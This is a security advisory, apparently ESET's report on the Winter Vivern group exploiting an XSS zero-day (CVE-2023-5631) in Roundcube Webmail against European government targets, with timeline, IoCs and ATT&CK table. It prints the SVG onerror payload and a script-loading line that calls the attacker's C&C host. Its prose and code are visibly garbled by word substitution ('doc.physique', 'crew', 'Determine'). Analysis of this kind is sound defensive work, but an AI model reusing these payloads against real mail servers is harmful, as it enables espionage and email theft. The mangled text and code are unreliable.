ESET Analysis
ESET Analysis recommends updating Roundcube Webmail to the newest out there model as quickly as attainable
25 Oct 2023
•
,
5 min. learn
ESET Analysis has been carefully monitoring the cyberespionage operations of Winter Vivern for greater than a 12 months and, throughout our routine monitoring, we discovered that the group started exploiting a zero-day XSS vulnerability within the Roundcube Webmail server on October 11th, 2023. It is a completely different vulnerability than CVE-2020-35730, which was additionally exploited by the group based on our analysis.
In keeping with ESET telemetry knowledge, the marketing campaign focused Roundcube Webmail servers belonging to governmental entities and a suppose tank, all in Europe.
Vulnerability disclosure timeline:
- 2023-10-12: ESET Analysis reported the vulnerability to the Roundcube crew.
- 2023-10-14: The Roundcube crew responded and acknowledged the vulnerability.
- 2023-10-14: The Roundcube crew patched the vulnerability.
- 2023-10-16: The Roundcube crew launched safety updates to handle the vulnerability (1.6.4, 1.5.5, and 1.4.15).
- 2023-10-18: ESET CNA points a CVE for the vulnerability (CVE-2023-5631).
- 2023-10-25: ESET Analysis blogpost printed.
We wish to thank the Roundcube builders for his or her fast reply and for patching the vulnerability in such a short while body.
Winter Vivern profile
Winter Vivern is a cyberespionage group first revealed by DomainTools in 2021. It’s thought to have been energetic since at the very least 2020 and it targets governments in Europe and Central Asia. To compromise its targets, the group makes use of malicious paperwork, phishing web sites, and a customized PowerShell backdoor (see the articles from the State Cyber Protection Centre of Ukraine and from SentinelLabs). We consider with low confidence that Winter Vivern is linked to MoustachedBouncer, a classy Belarus-aligned group that we first printed about in August, 2023.
Winter Vivern has been focusing on Zimbra and Roundcube electronic mail servers belonging to governmental entities since at the very least 2022 – see this text from Proofpoint. Specifically, we noticed that the group exploited CVE-2020-35730, one other XSS vulnerability in Roundcube, in August and September 2023. Notice that Sednit (also referred to as APT28) is exploiting this previous XSS vulnerability in Roundcube as properly, generally towards the identical targets.
Technical particulars
Exploitation of the XSS vulnerability, assigned CVE-2023-5631, could be achieved remotely by sending a specifically crafted electronic mail message. On this Winter Vivern marketing campaign, the emails have been despatched from crew.managment@outlook[.]com and had the topic Get began in your Outlook, as proven in Determine 1.
At first sight, the e-mail doesn’t appear malicious – but when we look at the HTML supply code, proven in Determine 2, we will see an SVG tag on the finish, which comprises a base64-encoded payload.
As soon as we decode the base64-encoded worth within the href attribute of the use tag, now we have:
<svg id=”https://www.welivesecurity.com/en/eset-research/winter-vivern-exploits-zero-day-vulnerability-roundcube-webmail-servers/x” xmlns=”http://www.w3.org/2000/svg”> <picture href=”https://www.welivesecurity.com/en/eset-research/winter-vivern-exploits-zero-day-vulnerability-roundcube-webmail-servers/x” onerror=”eval(atob(‘<base64-encoded payload>’))” /></svg>
Because the x worth argument of the href attribute just isn’t a legitimate URL, this object’s onerror attribute might be activated. Decoding the payload within the onerror attribute offers us the next JavaScript code (with the malicious URL manually defanged), which might be executed within the browser of the sufferer within the context of their Roundcube session:
var fe=doc.createElement(‘script’);fe.src=”https://recsecas[.]com/controlserver/checkupdate.js”;doc.physique.appendChild(fe);
Surprisingly, we observed that the JavaScript injection labored on a completely patched Roundcube occasion. It turned out that this was a zero-day XSS vulnerability affecting the server-side script rcube_washtml.php, which doesn’t correctly sanitize the malicious SVG doc earlier than being added to the HTML web page interpreted by a Roundcube consumer. We reported it to Roundcube and it was patched on October 14th, 2023 (see this commit). The vulnerability impacts Roundcube versions 1.6.x earlier than 1.6.4, 1.5.x earlier than 1.5.5, and 1.4.x earlier than 1.4.15.
In abstract, by sending a specifically crafted electronic mail message, attackers are in a position to load arbitrary JavaScript code within the context of the Roundcube consumer’s browser window. No handbook interplay apart from viewing the message in an online browser is required.
The second stage is a straightforward JavaScript loader named checkupdate.js and is proven in Determine 3.
The ultimate JavaScript payload – proven in Determine 4 – is ready to listing folders and emails within the present Roundcube account, and to exfiltrate electronic mail messages to the C&C server by making HTTP requests to https://recsecas[.]com/controlserver/saveMessage.
Conclusion
Winter Vivern has stepped up its operations through the use of a zero-day vulnerability in Roundcube. Beforehand, it was utilizing identified vulnerabilities in Roundcube and Zimbra, for which proofs of idea can be found on-line.
Regardless of the low sophistication of the group’s toolset, it’s a risk to governments in Europe due to its persistence, very common working of phishing campaigns, and since a major variety of internet-facing purposes will not be often up to date though they’re identified to comprise vulnerabilities.
For any inquiries about our analysis printed on WeLiveSecurity, please contact us at [email protected].
ESET Analysis affords non-public APT intelligence experiences and knowledge feeds. For any inquiries about this service, go to the ESET Threat Intelligence web page.
IoCs
Recordsdata
|
SHA-1 |
Filename |
Detection |
Description |
|
97ED594EF2B5755F0549C6C5758377C0B87CFAE0 |
checkupdate.js |
JS/WinterVivern.B |
JavaScript loader. |
|
8BF7FCC70F6CE032217D9210EF30314DDD6B8135 |
N/A |
JS/Kryptik.BIK |
JavaScript payload exfiltrating emails in Roundcube. |
Community
|
IP |
Area |
Internet hosting supplier |
First seen |
Particulars |
|
38.180.76[.]31 |
recsecas[.]com |
M247 Europe SRL |
2023-09-28 |
Winter Vivern C&C server |
E-mail addresses
crew.managment@outlook[.]com
This desk was constructed utilizing version 13 of the MITRE ATT&CK framework.
|
Tactic |
ID |
Identify |
Description |
|
Useful resource Improvement |
Purchase Infrastructure: Domains |
Winter Vivern operators purchased a site at Registrar.eu. |
|
|
Purchase Infrastructure: Server |
Winter Vivern operators rented a server at M247. |
||
|
Develop Capabilities: Exploits |
Winter Vivern operators in all probability developed an exploit for Roundcube. |
||
|
Preliminary Entry |
Exploit Public-Going through Utility |
Winter Vivern despatched an electronic mail exploiting CVE‑2023-5631 in Roundcube. |
|
|
Phishing |
The vulnerability is triggered by way of a phishing electronic mail, which ought to be opened within the Roundcube webmail by the sufferer. |
||
|
Execution |
Exploitation for Shopper Execution |
The JavaScript payload is executed by an XSS vulnerability in Roundcube. |
|
|
Discovery |
Account Discovery: E-mail Account |
The JavaScript payload can listing folders within the electronic mail account. |
|
|
Assortment |
E-mail Assortment: Distant E-mail Assortment |
The JavaScript payload can exfiltrate emails from the Roundcube account. |
|
|
Command and Management |
Utility Layer Protocol: Internet Protocols |
C&C communications use HTTPs. |
|
|
Exfiltration |
Exfiltration Over C2 Channel |
Exfiltration is finished by way of HTTPs and to the identical C&C server. |
